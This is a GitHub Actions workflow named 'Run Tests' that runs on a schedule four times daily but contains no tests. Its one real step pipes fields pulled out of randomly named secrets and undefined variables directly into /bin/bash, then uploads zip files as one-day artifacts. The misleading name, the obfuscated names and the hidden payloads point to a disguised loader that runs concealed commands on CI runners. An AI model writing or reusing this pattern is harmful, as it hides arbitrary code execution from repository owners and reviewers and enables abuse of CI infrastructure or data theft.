name: Run Tests
on:
  workflow_dispatch:

  schedule:
    - cron: '13 2,8,14,20 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  scheduler:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Invoke
        env:
          voxz608: ${{ secrets.voxz608 }}
        run: |
          printf '%s' "$voxz608" | jq -r .aw5 | /bin/bash
          echo $zotz98546 | jq -r .b709 | /bin/bash
          printf '%s' "$j9944" | jq -r .tn0 | /bin/bash
          printf '%s' "$wz798" | jq -r .plu8 | /bin/bash
          printf '%s' "$bxocl4" | jq -r .oih3 | /bin/bash
          printf '%s' "$v78196" | jq -r .nhux0 | /bin/bash
          echo $sst1 | jq -r .yc8 | /bin/bash

      - name: Store artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: qKfix8gC
          path: "*.zip"
          retention-days: 1
